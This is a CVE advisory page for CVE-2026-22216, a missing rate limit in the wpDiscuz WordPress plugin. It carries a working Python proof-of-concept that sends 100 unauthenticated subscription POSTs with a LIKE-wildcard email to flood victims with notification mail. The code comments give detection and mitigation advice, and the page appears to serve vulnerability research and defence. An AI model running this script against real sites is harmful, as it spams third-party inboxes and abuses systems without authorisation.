Security Vulnerability Report
CVE-2026-22216 CVSS 6.5 MEDIUM

CVE-2026-22216

Published: 2026-03-13 19:54:12
Last Modified: 2026-03-17 11:43:08

Description

wpDiscuz before 7.6.47 contains a missing rate limiting vulnerability that allows unauthenticated attackers to subscribe arbitrary email addresses to post notifications by sending POST requests to the wpdAddSubscription handler in class.WpdiscuzHelperAjax.php. Attackers can exploit LIKE wildcard characters in the subscription query to match multiple email addresses and generate unwanted notification emails to victim accounts.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:* - VULNERABLE
wpDiscuz < 7.6.47

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import time

# CVE-2026-22216 PoC - wpDiscuz Missing Rate Limiting (CWE-799 in the NVD record)
# Target: WordPress site with wpDiscuz plugin < 7.6.47
#
# What this script does: it repeats an unauthenticated POST to
# /wp-admin/admin-ajax.php with action=wpdAddSubscription, passing an email
# value that contains a SQL LIKE wildcard ('%'). Per the CVE description the
# vulnerable handler matches that pattern against multiple stored addresses
# and sends notification mail to each of them; nothing in this script is
# rate-limited because the affected versions do not limit the handler.
# Fixed in wpDiscuz 7.6.47.
#
# Detection: in web-server / WAF logs, look for bursts of POST requests to
# admin-ajax.php with action=wpdAddSubscription from a single unauthenticated
# client, and for subscription email values carrying LIKE metacharacters
# ('%' or '_') rather than a literal address.
# Mitigation: update to 7.6.47 or later; rate-limit the subscription handler
# per client/IP; validate the email parameter as a literal address and
# escape or reject LIKE metacharacters before it reaches the query.
# NOTE(review): the NVD JSON on this page also carries a Primary CVSS 3.1
# score of 5.3 (vector ending A:N) alongside the 6.5 (A:L) secondary score
# shown in the page header; both are MEDIUM.
TARGET_URL = "http://target-wordpress-site.com"
AJAX_ENDPOINT = f"{TARGET_URL}/wp-admin/admin-ajax.php"
# Post ID whose notifications the request subscribes to (placeholder value)
TARGET_POST_ID = "123"
# Email value sent to the handler; the '%' is the LIKE wildcard the
# description refers to, so it is a pattern, not a single address
TARGET_EMAIL = "user%@target.com"

def subscribe_email(post_id: str, email: str) -> tuple[int | None, str]:
    """Send one wpdAddSubscription form POST to AJAX_ENDPOINT.

    Args:
        post_id: value of the ``postId`` form field.
        email: value of the ``email`` form field (sent verbatim).

    Returns:
        ``(status_code, body_text)`` for any HTTP response, including error
        statuses; ``(None, error_text)`` when the request itself fails with a
        requests RequestException (connection error, timeout, ...).
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        # requests already sets this content type for ``data=`` form posts;
        # the explicit header only pins it
        "Content-Type": "application/x-www-form-urlencoded"
    }
    data = {
        "action": "wpdAddSubscription",
        "postId": post_id,
        "email": email
    }
    try:
        # 10 s timeout so one stalled request cannot block the loop in exploit()
        response = requests.post(AJAX_ENDPOINT, data=data, headers=headers, timeout=10)
        return response.status_code, response.text
    except requests.exceptions.RequestException as e:
        return None, str(e)

def exploit() -> None:
    """Issue a fixed batch of subscription requests and print each HTTP status.

    Calls subscribe_email() ``num_requests`` times with the module-level
    TARGET_POST_ID / TARGET_EMAIL, sleeping 0.1 s between calls. Only
    responses with a status code are echoed; transport failures (status
    ``None``) are skipped silently and their error text is discarded.
    """
    print(f"[*] Starting CVE-2026-22216 exploitation")
    print(f"[*] Target: {TARGET_URL}")
    print(f"[*] Subscribing: {TARGET_EMAIL}")
    # Same request repeated; the affected handler imposes no request-frequency
    # limit (CWE-799), which is the defect a patched server should reject here
    num_requests = 100
    for i in range(num_requests):
        status, resp = subscribe_email(TARGET_POST_ID, TARGET_EMAIL)
        # status is None on a RequestException; ``resp`` (the error text) is
        # not printed in that case, so failures are invisible in the output
        if status:
            print(f"[+] Request {i+1}/{num_requests} - Status: {status}")
        time.sleep(0.1) # fixed 0.1 s pause between requests (about 10 req/s)
    print(f"[*] Exploitation completed. {num_requests} requests sent.")

if __name__ == "__main__":
    exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22216", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:11.653", "lastModified": "2026-03-17T11:43:07.663", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "wpDiscuz before 7.6.47 contains a missing rate limiting vulnerability that allows unauthenticated attackers to subscribe arbitrary email addresses to post notifications by sending POST requests to the wpdAddSubscription handler in class.WpdiscuzHelperAjax.php. Attackers can exploit LIKE wildcard characters in the subscription query to match multiple email addresses and generate unwanted notification emails to victim accounts."}, {"lang": "es", "value": "wpDiscuz anterior a la versión 7.6.47 contiene una vulnerabilidad de falta de limitación de tasa que permite a atacantes no autenticados suscribir direcciones de correo electrónico arbitrarias a notificaciones de publicaciones enviando solicitudes POST al gestor wpdAddSubscription en class.WpdiscuzHelperAjax.php. 
Los atacantes pueden explotar caracteres comodín LIKE en la consulta de suscripción para hacer coincidir múltiples direcciones de correo electrónico y generar correos electrónicos de notificación no deseados a cuentas de víctimas."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", 
"attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-799"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "7.6.47", "matchCriteriaId": "A81F51B9-0C21-4F7E-876B-C09A66B9AE05"}]}]}], "references": [{"url": "https://wordpress.org/plugins/wpdiscuz/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://wordpress.org/plugins/wpdiscuz/#developers", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/wpdiscuz-before-no-rate-limiting-on-subscription-endpoints-with-like-wildcard-bypass", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}